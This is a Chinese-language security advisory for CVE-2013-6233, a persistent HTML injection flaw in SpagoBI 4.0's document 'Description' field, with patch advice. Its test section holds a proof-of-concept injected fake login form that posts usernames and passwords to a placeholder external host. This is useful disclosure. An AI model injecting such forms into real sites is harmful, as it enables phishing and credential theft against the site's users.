安全研究
安全漏洞
SpagoBI 'Description'字段HTML注入漏洞
发布日期:2014-03-01
更新日期:2014-03-04
受影响系统:SpagoBI SpagoBI 4.0
描述:
BUGTRAQ ID:
65915
CVE(CAN) ID:
CVE-2013-6233
SpagoBI是开源的商业智能软件包。
SpagoBI 4.0及其他版本的某些输入字段(例如'Short document metadata'内的'Description'输入字段)存在持续性脚本插入漏洞,这可使远程攻击者将HTML代码注入到远程站点,从而执行钓鱼攻击并获取凭证。
<*来源:Christian Catalano
链接:
http://www.securityfocus.com/archive/1/531322/30/0/threaded
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<form method="POST" action="
http://www.example.com/login/login.php.";>
Username: <input type="text" name="username" size="15" /><br />
Password: <input type="password" name="passwort" size="15" /><br />
<div align="center">
<p><input type="submit" value="Login" /></p>
</div>
</form>
建议:
厂商补丁:
SpagoBI
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.spagoworld.org
浏览次数:1942
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |